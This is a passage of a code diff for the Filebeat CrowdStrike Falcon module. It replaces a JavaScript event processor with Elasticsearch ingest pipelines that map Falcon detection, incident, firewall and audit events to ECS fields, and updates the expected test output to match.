.Convert({ - fields: [{ - from: "crowdstrike.event.OperationName", - to: "message", - }, { - from: "crowdstrike.event.UserIp", - to: "source.ip", - type: "ip" - }, { - from: "crowdstrike.event.UserIp", - to: "related.ip", - type: "ip" - }], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(convertUsername) - .Add(convertEventAction) - .Build(), - - AuthActivityAuditEvent: new processor.Chain() - .AddFields({ - fields: { - kind: "event", - category: ["authentication"], - type: ["change"], - dataset: "crowdstrike.falcon_audit", - }, - target: "event", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.ServiceName", - to: "message", - }, { - from: "crowdstrike.event.UserIp", - to: "source.ip", - type: "ip" - }, { - from: "crowdstrike.event.UserIp", - to: "related.ip", - type: "ip" - }], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(function (evt) { - evt.Put("event.action", convertUnderscore(evt.Get("crowdstrike.event.OperationName"))) - convertUsername(evt) - }) - .Build(), - - FirewallMatchEvent: new processor.Chain() - .AddFields({ - fields: { - kind: "event", - category: ["network"], - type: ["start", "connection"], - outcome: ["unknown"], - dataset: "crowdstrike.falcon_endpoint", - }, - target: "event", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.Ipv", - to: "network.type", - }, { - from: "crowdstrike.event.PID", - to: "process.pid", - type: "long" - }, - { - from: "crowdstrike.event.RuleId", - to: "rule.id" - }, - { - from: "crowdstrike.event.RuleName", - to: "rule.name" - }, - { - from: "crowdstrike.event.RuleGroupName", - to: "rule.ruleset" - }, - { - from: "crowdstrike.event.RuleDescription", - to: "rule.description" - }, - { - from: "crowdstrike.event.RuleFamilyID", - to: "rule.category" - }, - { - from: "crowdstrike.event.HostName", - to: "host.name" - }, - { - from: "crowdstrike.event.Ipv", - to: "network.type", - }, - { - from: "crowdstrike.event.EventType", - to: "event.code", - } - ], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(function (evt) { - evt.Put("message", "Firewall Rule '" + evt.Get("crowdstrike.event.RuleName") + "' triggered") - convertEventAction(evt) - convertProcess(evt) - convertSourceDestination(evt) - }) - .Build(), - - RemoteResponseSessionStartEvent: new processor.Chain() - .AddFields({ - fields: { - "event.kind": "event", - "event.type": ["start"], - "event.dataset": "crowdstrike.falcon_audit", - message: "Remote response session started", - }, - target: "", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.HostnameField", - to: "host.name", - }], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(convertUsername) - .Add(convertEventAction) - .Build(), - - RemoteResponseSessionEndEvent: new processor.Chain() - .AddFields({ - fields: { - "event.kind": "event", - "event.type": ["end"], - "event.dataset": "crowdstrike.falcon_audit", - message: "Remote response session ended", - }, - target: "", - }) - .Convert({ - fields: [{ - from: "crowdstrike.event.HostnameField", - to: "host.name", - }], - mode: "copy", - ignore_missing: true, - fail_on_error: false - }) - .Add(convertUsername) - .Add(convertEventAction) - .Build(), - } - - // main processor - return new processor.Chain() - .DecodeJSONFields({ - fields: ["message"], - target: "crowdstrike", - process_array: true, - max_depth: 8 - }) - .Add(function (evt) { - evt.Delete("message"); - evt.Delete("host.name"); - - convertToMSEpoch(evt, "crowdstrike.event.ProcessStartTime") - convertToMSEpoch(evt, "crowdstrike.event.ProcessEndTime") - convertToMSEpoch(evt, "crowdstrike.event.IncidentStartTime") - convertToMSEpoch(evt, "crowdstrike.event.IncidentEndTime") - convertToMSEpoch(evt, "crowdstrike.event.StartTimestamp") - convertToMSEpoch(evt, "crowdstrike.event.EndTimestamp") - convertToMSEpoch(evt, "crowdstrike.event.UTCTimestamp") - convertToMSEpoch(evt, "crowdstrike.metadata.eventCreationTime") - - var outcome = evt.Get("crowdstrike.event.Success") - if (outcome === true) { - evt.Put("event.outcome", "success") - } else if (outcome === false) { - evt.Put("event.outcome", "failure") - } else { - evt.Put("event.outcome", "unknown") - } - - var eventProcessor = eventProcessors[evt.Get("crowdstrike.metadata.eventType")] - if (eventProcessor) { - eventProcessor.Run(evt) - } - }) - .Convert({ - fields: [{ - from: "crowdstrike.metadata.eventCreationTime", - to: "@timestamp", - }], - mode: "copy", - ignore_missing: false, - fail_on_error: true - }) - .Convert({ - fields: [ - { - from: "crowdstrike.event.LateralMovement", - type: "long", - }, - { - from: "crowdstrike.event.LocalPort", - type: "long", - }, - { - from: "crowdstrike.event.MatchCount", - type: "long", - }, - { - from: "crowdstrike.event.MatchCountSinceLastReport", - type: "long", - }, - { - from: "crowdstrike.event.PID", - type: "long", - }, - { - from: "crowdstrike.event.RemotePort", - type: "long", - }, - { - from: "source.port", - type: "long", - }, - { - from: "destination.port", - type: "long", - } - ], - ignore_missing: true, - fail_on_error: false - }) - .Build() - .Run -})(); - -function process(evt) { - crowdstrikeFalconProcessor(evt); -} diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/auth_activity_audit.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/auth_activity_audit.yml new file mode 100644 index 000000000000..c7ba463c7bcc --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/auth_activity_audit.yml @@ -0,0 +1,34 @@ +processors: + - set: + field: event.kind + value: event + - append: + field: event.category + value: [authentication] + - append: + field: event.type + value: [change] + - set: + field: event.dataset + value: crowdstrike.falcon_audit + - convert: + field: crowdstrike.event.ServiceName + type: string + target_field: message + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.UserIp + target_field: source.ip + type: string + ignore_missing: true + ignore_failure: true + if: ctx?.crowdstrike?.event?.UserIp != null && ctx?.crowdstrike?.event?.UserIp != "" + - script: + lang: painless + source: | + def regex = /([a-z0-9])([A-Z])/; + def replacement = "$1_$2"; + def action = ctx?.crowdstrike?.event?.OperationName; + if (action == null || action == "") return; + ctx["event.action"] = regex.matcher(action).replaceAll(replacement).toLowerCase(); diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/detection_summary.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/detection_summary.yml new file mode 100644 index 000000000000..b721c6df1bf5 --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/detection_summary.yml @@ -0,0 +1,163 @@ +processors: + - set: + field: event.kind + value: alert + - append: + field: event.category + value: [malware] + - append: + field: event.type + value: [info] + - set: + field: event.dataset + value: crowdstrike.falcon_endpoint + - set: + field: agent.type + value: falcon + - convert: + field: crowdstrike.event.LocalIP + target_field: source.ip + type: string + ignore_failure: true + ignore_missing: true + if: ctx?.crowdstrike?.event?.LocalIP != null && ctx?.crowdstrike?.event?.LocalIP != "" + - convert: + field: crowdstrike.event.ProcessId + target_field: process.pid + ignore_failure: true + type: long + ignore_missing: true + - convert: + field: crowdstrike.event.ParentImageFileName + target_field: process.parent.executable + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.ParentCommandLine + target_field: process.parent.command_line + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.PatternDispositionDescription + target_field: event.action + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.FalconHostLink + target_field: event.url + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.Severity + target_field: event.severity + type: long + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.DetectDescription + target_field: message + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.FileName + target_field: process.name + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.UserName + target_field: user.name + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.MachineDomain + target_field: user.domain + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.SensorId + target_field: agent.id + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.ComputerName + target_field: host.name + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.SHA256String + target_field: file.hash.sha256 + type: string + ignore_failure: true + ignore_missing: true + - append: + field: related.hash + value: "{{file.hash.sha256}}" + allow_duplicates: false + ignore_failure: true + if: ctx?.file?.hash?.sha256 != null && ctx?.file?.hash?.sha256 != "" && !(/^0+$/.matcher(ctx.file.hash.sha256).matches()) + - convert: + field: crowdstrike.event.MD5String + target_field: file.hash.md5 + type: string + ignore_failure: true + ignore_missing: true + - append: + field: related.hash + value: "{{file.hash.md5}}" + allow_duplicates: false + ignore_failure: true + if: ctx?.file?.hash?.md5 != null && ctx?.file?.hash?.md5 != "" && !(/^0+$/.matcher(ctx.file.hash.md5).matches()) + - convert: + field: crowdstrike.event.SHA1String + target_field: file.hash.sha1 + type: string + ignore_failure: true + ignore_missing: true + - append: + field: related.hash + value: "{{file.hash.sha1}}" + allow_duplicates: false + ignore_failure: true + if: ctx?.file?.hash?.sha1 != null && ctx?.file?.hash?.sha1 != "" && !(/^0+$/.matcher(ctx.file.hash.sha1).matches()) + - convert: + field: crowdstrike.event.DetectName + target_field: rule.name + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.DetectDescription + target_field: rule.description + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.Technique + target_field: threat.technique.name + type: string + ignore_failure: true + ignore_missing: true + - lowercase: + field: threat.technique.name + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.Tactic + target_field: threat.tactic.name + type: string + ignore_failure: true + ignore_missing: true + - lowercase: + field: threat.tactic.name + ignore_missing: true + ignore_failure: true diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/firewall_match.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/firewall_match.yml new file mode 100644 index 000000000000..5437812dd1c0 --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/firewall_match.yml @@ -0,0 +1,137 @@ +processors: + - set: + field: event.kind + value: event + - append: + field: event.category + value: [network] + - append: + field: event.action + value: [firewall_match_event] + - append: + field: event.type + value: [start, connection] + - set: + field: event.dataset + value: crowdstrike.falcon_endpoint + - set: + field: message + value: "Firewall Rule '{{crowdstrike.event.RuleName}}' triggered" + if: ctx?.crowdstrike?.event?.RuleName != null + ignore_failure: true + - convert: + field: "crowdstrike.event.Ipv" + target_field: "network.type" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.PID" + target_field: "process.pid" + ignore_failure: true + ignore_missing: true + type: "long" + - convert: + field: "crowdstrike.event.RuleId" + target_field: "rule.id" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.RuleName" + target_field: "rule.name" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.RuleGroupName" + target_field: "rule.ruleset" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.RuleDescription" + target_field: "rule.description" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.RuleFamilyID" + target_field: "rule.category" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.HostName" + target_field: "host.name" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.Ipv" + target_field: "network.type" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: "crowdstrike.event.EventType" + target_field: "event.code" + type: string + ignore_missing: true + ignore_failure: true + - set: + field: network.direction + value: ingress + if: ctx?.crowdstrike?.event?.ConnectionDirection == "1" + - set: + field: source.ip + value: "{{crowdstrike.event.RemoteAddress}}" + ignore_empty_value: true + if: ctx?.crowdstrike?.event?.ConnectionDirection == "1" + - convert: + field: crowdstrike.event.RemotePort + target_field: source.port + type: long + ignore_missing: true + ignore_failure: true + if: ctx?.crowdstrike?.event?.ConnectionDirection == "1" + - set: + field: destination.ip + value: "{{crowdstrike.event.LocalAddress}}" + ignore_empty_value: true + if: ctx?.crowdstrike?.event?.ConnectionDirection == "1" + - convert: + field: crowdstrike.event.LocalPort + target_field: destination.port + type: long + ignore_missing: true + ignore_failure: true + if: ctx?.crowdstrike?.event?.ConnectionDirection == "1" + - set: + field: network.direction + value: ingress + if: ctx?.crowdstrike?.event?.ConnectionDirection != "1" + - set: + field: destination.ip + value: "{{crowdstrike.event.RemoteAddress}}" + ignore_empty_value: true + if: ctx?.crowdstrike?.event?.ConnectionDirection != "1" + - convert: + field: crowdstrike.event.RemotePort + target_field: destination.port + type: long + ignore_missing: true + ignore_failure: true + if: ctx?.crowdstrike?.event?.ConnectionDirection != "1" + - set: + field: source.ip + value: "{{crowdstrike.event.LocalAddress}}" + ignore_empty_value: true + if: ctx?.crowdstrike?.event?.ConnectionDirection != "1" + - convert: + field: crowdstrike.event.LocalPort + target_field: source.port + type: long + ignore_missing: true + ignore_failure: true + if: ctx?.crowdstrike?.event?.ConnectionDirection != "1" diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/incident_summary.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/incident_summary.yml new file mode 100644 index 000000000000..5877ed4f20d2 --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/incident_summary.yml @@ -0,0 +1,29 @@ +processors: + - set: + field: event.kind + value: alert + - append: + field: event.category + value: [malware] + - append: + field: event.type + value: [info] + - set: + field: event.action + value: incident + - set: + field: event.dataset + value: crowdstrike.falcon_endpoint + - set: + field: agent.type + value: falcon + - convert: + field: crowdstrike.event.FalconHostLink + target_field: event.url + type: string + ignore_failure: true + ignore_missing: true + - set: + field: message + value: "Incident score {{crowdstrike.event.FineScore}}" + if: ctx?.crowdstrike?.event?.FineScore != null diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/pipeline.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/pipeline.yml index 3aa632ab7158..7e7efe5cd745 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/ingest/pipeline.yml +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/pipeline.yml @@ -3,6 +3,313 @@ processors: - set: field: event.ingested value: '{{_ingest.timestamp}}' + - date: + field: crowdstrike.event.ProcessStartTime + target_field: crowdstrike.event.ProcessStartTime + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.ProcessStartTime != null && + !(ctx.crowdstrike.event.ProcessStartTime instanceof String) && + ctx.crowdstrike.event.ProcessStartTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.ProcessStartTime) + 1) >= 12 + - date: + field: crowdstrike.event.ProcessEndTime + target_field: crowdstrike.event.ProcessEndTime + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.ProcessEndTime != null && + !(ctx.crowdstrike.event.ProcessEndTime instanceof String) && + ctx.crowdstrike.event.ProcessEndTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.ProcessEndTime) + 1) >= 12 + - date: + field: crowdstrike.event.IncidentStartTime + target_field: crowdstrike.event.IncidentStartTime + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.IncidentStartTime != null && + !(ctx.crowdstrike.event.IncidentStartTime instanceof String) && + ctx.crowdstrike.event.IncidentStartTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.IncidentStartTime) + 1) >= 12 + - date: + field: crowdstrike.event.IncidentEndTime + target_field: crowdstrike.event.IncidentEndTime + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.IncidentEndTime != null && + !(ctx.crowdstrike.event.IncidentEndTime instanceof String) && + ctx.crowdstrike.event.IncidentEndTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.IncidentEndTime) + 1) >= 12 + - date: + field: crowdstrike.event.StartTimestamp + target_field: crowdstrike.event.StartTimestamp + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.StartTimestamp != null && + !(ctx.crowdstrike.event.StartTimestamp instanceof String) && + ctx.crowdstrike.event.StartTimestamp != 0 && + (int)(Math.log10(ctx.crowdstrike.event.StartTimestamp) + 1) >= 12 + - date: + field: crowdstrike.event.EndTimestamp + target_field: crowdstrike.event.EndTimestamp + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.EndTimestamp != null && + !(ctx.crowdstrike.event.EndTimestamp instanceof String) && + ctx.crowdstrike.event.EndTimestamp != 0 && + (int)(Math.log10(ctx.crowdstrike.event.EndTimestamp) + 1) >= 12 + - date: + field: crowdstrike.event.UTCTimestamp + target_field: crowdstrike.event.UTCTimestamp + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.UTCTimestamp != null && + !(ctx.crowdstrike.event.UTCTimestamp instanceof String) && + ctx.crowdstrike.event.UTCTimestamp != 0 && + (int)(Math.log10(ctx.crowdstrike.event.UTCTimestamp) + 1) >= 12 + - date: + field: crowdstrike.metadata.eventCreationTime + target_field: crowdstrike.metadata.eventCreationTime + timezone: UTC + formats: + - UNIX_MS + ignore_failure: true + if: | + ctx?.crowdstrike?.metadata?.eventCreationTime != null && + !(ctx.crowdstrike.metadata.eventCreationTime instanceof String) && + ctx.crowdstrike.metadata.eventCreationTime != 0 && + (int)(Math.log10(ctx.crowdstrike.metadata.eventCreationTime) + 1) >= 12 + - date: + field: crowdstrike.event.ProcessStartTime + target_field: crowdstrike.event.ProcessStartTime + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.ProcessStartTime != null && + !(ctx.crowdstrike.event.ProcessStartTime instanceof String) && + ctx.crowdstrike.event.ProcessStartTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.ProcessStartTime) + 1) < 12 + - date: + field: crowdstrike.event.ProcessEndTime + target_field: crowdstrike.event.ProcessEndTime + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.ProcessEndTime != null && + !(ctx.crowdstrike.event.ProcessEndTime instanceof String) && + ctx.crowdstrike.event.ProcessEndTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.ProcessEndTime) + 1) < 12 + - date: + field: crowdstrike.event.IncidentStartTime + target_field: crowdstrike.event.IncidentStartTime + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.IncidentStartTime != null && + !(ctx.crowdstrike.event.IncidentStartTime instanceof String) && + ctx.crowdstrike.event.IncidentStartTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.IncidentStartTime) + 1) < 12 + - date: + field: crowdstrike.event.IncidentEndTime + target_field: crowdstrike.event.IncidentEndTime + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.IncidentEndTime != null && + !(ctx.crowdstrike.event.IncidentEndTime instanceof String) && + ctx.crowdstrike.event.IncidentEndTime != 0 && + (int)(Math.log10(ctx.crowdstrike.event.IncidentEndTime) + 1) < 12 + - date: + field: crowdstrike.event.StartTimestamp + target_field: crowdstrike.event.StartTimestamp + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.StartTimestamp != null && + !(ctx.crowdstrike.event.StartTimestamp instanceof String) && + ctx.crowdstrike.event.StartTimestamp != 0 && + (int)(Math.log10(ctx.crowdstrike.event.StartTimestamp) + 1) < 12 + - date: + field: crowdstrike.event.EndTimestamp + target_field: crowdstrike.event.EndTimestamp + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.EndTimestamp != null && + !(ctx.crowdstrike.event.EndTimestamp instanceof String) && + ctx.crowdstrike.event.EndTimestamp != 0 && + (int)(Math.log10(ctx.crowdstrike.event.EndTimestamp) + 1) < 12 + - date: + field: crowdstrike.event.UTCTimestamp + target_field: crowdstrike.event.UTCTimestamp + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.UTCTimestamp != null && + !(ctx.crowdstrike.event.UTCTimestamp instanceof String) && + ctx.crowdstrike.event.UTCTimestamp != 0 && + (int)(Math.log10(ctx.crowdstrike.event.UTCTimestamp) + 1) < 12 + - date: + field: crowdstrike.metadata.eventCreationTime + target_field: crowdstrike.metadata.eventCreationTime + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.metadata?.eventCreationTime != null && + !(ctx.crowdstrike.metadata.eventCreationTime instanceof String) && + ctx.crowdstrike.metadata.eventCreationTime != 0 && + (int)(Math.log10(ctx.crowdstrike.metadata.eventCreationTime) + 1) < 12 + - set: + field: event.outcome + value: success + if: ctx?.crowdstrike?.event?.Success == true + - set: + field: event.outcome + value: failure + if: ctx?.crowdstrike?.event?.Success == false + - set: + field: event.outcome + value: unknown + if: ctx?.event?.outcome == null + - convert: + field: crowdstrike.metadata.eventCreationTime + target_field: "@timestamp" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.LateralMovement + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.LocalPort + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.MatchCount + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.MatchCountSinceLastReport + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.PID + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.RemotePort + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: source.port + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: destination.port + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.UserName + target_field: user.name + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.UserId + target_field: user.name + type: string + ignore_missing: true + ignore_failure: true + if: ctx?.user?.name == null || ctx?.user?.name == "" + - set: + field: user.email + value: "{{user.name}}" + ignore_empty_value: true + ignore_failure: true + if: ctx?.user?.name != null && /@/.split(ctx.user.name).length == 2 + - script: + lang: painless + source: | + def commandLine = ctx?.crowdstrike?.event?.CommandLine; + if (commandLine != null) { + + commandLine = commandLine.trim(); + + if (commandLine != "") { + def args = Arrays.asList(/ /.split(commandLine)); + args.removeIf(arg -> arg == ""); + + ctx["process.command_line"] = commandLine; + ctx["process.args"] = args; + ctx["process.executable"] = args.get(0); + } + } + - pipeline: + name: '{< IngestPipeline "detection_summary" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "DetectionSummaryEvent" + - pipeline: + name: '{< IngestPipeline "incident_summary" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "IncidentSummaryEvent" + - pipeline: + name: '{< IngestPipeline "user_activity_audit" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "UserActivityAuditEvent" + - pipeline: + name: '{< IngestPipeline "auth_activity_audit" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "AuthActivityAuditEvent" + - pipeline: + name: '{< IngestPipeline "firewall_match" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "FirewallMatchEvent" + - pipeline: + name: '{< IngestPipeline "remote_response_session_start" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "RemoteResponseSessionStartEvent" + - pipeline: + name: '{< IngestPipeline "remote_response_session_end" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "RemoteResponseSessionEndEvent" - script: lang: painless if: ctx?.crowdstrike?.event != null @@ -12,6 +319,8 @@ processors: - '' - '-' - 'N/A' + - 'NA' + - 0 source: | ctx.crowdstrike.event.entrySet().removeIf(entry -> params.values.contains(entry.getValue())); - script: @@ -23,8 +332,33 @@ processors: - '' - '-' - 'N/A' + - 'NA' source: | ctx.crowdstrike.metadata.entrySet().removeIf(entry -> params.values.contains(entry.getValue())); + - append: + field: related.user + value: "{{user.name}}" + allow_duplicates: false + ignore_failure: true + if: ctx?.user?.name != null && ctx?.user?.name != "" + - append: + field: related.ip + value: "{{source.ip}}" + ignore_failure: true + allow_duplicates: false + if: ctx?.source?.ip != null && ctx?.source?.ip != "" + - append: + field: related.ip + value: "{{destination.ip}}" + ignore_failure: true + allow_duplicates: false + if: ctx?.destination?.ip != null && ctx?.destination?.ip != "" + - append: + field: related.hosts + value: "{{host.name}}" + ignore_failure: true + allow_duplicates: false + if: ctx?.host?.name != null && ctx?.host?.name != "" on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_end.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_end.yml new file mode 100644 index 000000000000..4e3b7b834a97 --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_end.yml @@ -0,0 +1,25 @@ +processors: + - set: + field: event.kind + value: event + - append: + field: event.category + value: [network] + - append: + field: event.action + value: [remote_response_session_end_event] + - append: + field: event.type + value: [end, session] + - set: + field: event.dataset + value: crowdstrike.falcon_audit + - set: + field: message + value: Remote response session ended. + - convert: + field: crowdstrike.event.HostnameField + target_field: host.name + type: string + ignore_failure: true + ignore_missing: true diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_start.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_start.yml new file mode 100644 index 000000000000..834a3dee73d6 --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_start.yml @@ -0,0 +1,25 @@ +processors: + - set: + field: event.kind + value: event + - append: + field: event.category + value: [network] + - append: + field: event.action + value: [remote_response_session_start_event] + - append: + field: event.type + value: [start, session] + - set: + field: event.dataset + value: crowdstrike.falcon_audit + - set: + field: message + value: Remote response session started. + - convert: + field: crowdstrike.event.HostnameField + target_field: host.name + type: string + ignore_failure: true + ignore_missing: true diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/user_activity_audit.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/user_activity_audit.yml new file mode 100644 index 000000000000..6998062561d0 --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/user_activity_audit.yml @@ -0,0 +1,29 @@ +processors: + - set: + field: event.kind + value: event + - append: + field: event.category + value: [iam] + - append: + field: event.type + value: [change] + - set: + field: event.dataset + value: crowdstrike.falcon_audit + - set: + field: event.action + value: user_activity_audit_event + - convert: + field: crowdstrike.event.OperationName + target_field: message + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.UserIp + target_field: source.ip + type: string + ignore_failure: true + ignore_missing: true + if: ctx?.crowdstrike?.event?.UserIp != null && ctx?.crowdstrike?.event?.UserIp != "" diff --git a/x-pack/filebeat/module/crowdstrike/falcon/manifest.yml b/x-pack/filebeat/module/crowdstrike/falcon/manifest.yml index 905124a0eaba..d4f04b84f114 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/manifest.yml +++ b/x-pack/filebeat/module/crowdstrike/falcon/manifest.yml @@ -8,4 +8,13 @@ var: default: [forwarded] input: config/falcon.yml -ingest_pipeline: ingest/pipeline.yml + +ingest_pipeline: + - ingest/pipeline.yml + - ingest/auth_activity_audit.yml + - ingest/detection_summary.yml + - ingest/firewall_match.yml + - ingest/incident_summary.yml + - ingest/remote_response_session_end.yml + - ingest/remote_response_session_start.yml + - ingest/user_activity_audit.yml diff --git a/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-audit-events.log-expected.json b/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-audit-events.log-expected.json index 4d21948cac77..690cb98ed095 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-audit-events.log-expected.json +++ b/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-audit-events.log-expected.json @@ -9,13 +9,19 @@ "crowdstrike.metadata.eventType": "RemoteResponseSessionStartEvent", "crowdstrike.metadata.offset": 1045, "crowdstrike.metadata.version": "1.0", - "event.action": "remote_response_session_start_event", + "event.action": [ + "remote_response_session_start_event" + ], + "event.category": [ + "network" + ], "event.dataset": "crowdstrike.falcon_audit", "event.kind": "event", "event.module": "crowdstrike", "event.outcome": "unknown", "event.type": [ - "start" + "start", + "session" ], "fileset.name": "falcon", "host.name": "hostnameofmachine", @@ -24,8 +30,13 @@ "multiline" ], "log.offset": 0, - "message": "Remote response session started", - "related.user": "first.last@company.com", + "message": "Remote response session started.", + "related.hosts": [ + "hostnameofmachine" + ], + "related.user": [ + "first.last@company.com" + ], "service.type": "crowdstrike", "tags": [ "forwarded" @@ -43,13 +54,19 @@ "crowdstrike.metadata.eventType": "RemoteResponseSessionEndEvent", "crowdstrike.metadata.offset": 1046, "crowdstrike.metadata.version": "1.0", - "event.action": "remote_response_session_end_event", + "event.action": [ + "remote_response_session_end_event" + ], + "event.category": [ + "network" + ], "event.dataset": "crowdstrike.falcon_audit", "event.kind": "event", "event.module": "crowdstrike", "event.outcome": "unknown", "event.type": [ - "end" + "end", + "session" ], "fileset.name": "falcon", "host.name": "hostnameofmachine", @@ -58,8 +75,13 @@ "multiline" ], "log.offset": 457, - "message": "Remote response session ended", - "related.user": "first.last@company.com", + "message": "Remote response session ended.", + "related.hosts": [ + "hostnameofmachine" + ], + "related.user": [ + "first.last@company.com" + ], "service.type": "crowdstrike", "tags": [ "forwarded" @@ -119,8 +141,12 @@ ], "log.offset": 910, "message": "Crowdstrike Streaming API", - "related.ip": "10.10.0.8", - "related.user": "api-client-id:1234567890abcdefghijklmnopqrstuvwxyz", + "related.ip": [ + "10.10.0.8" + ], + "related.user": [ + "api-client-id:1234567890abcdefghijklmnopqrstuvwxyz" + ], "service.type": "crowdstrike", "source.ip": "10.10.0.8", "tags": [ @@ -158,8 +184,12 @@ ], "log.offset": 2152, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": 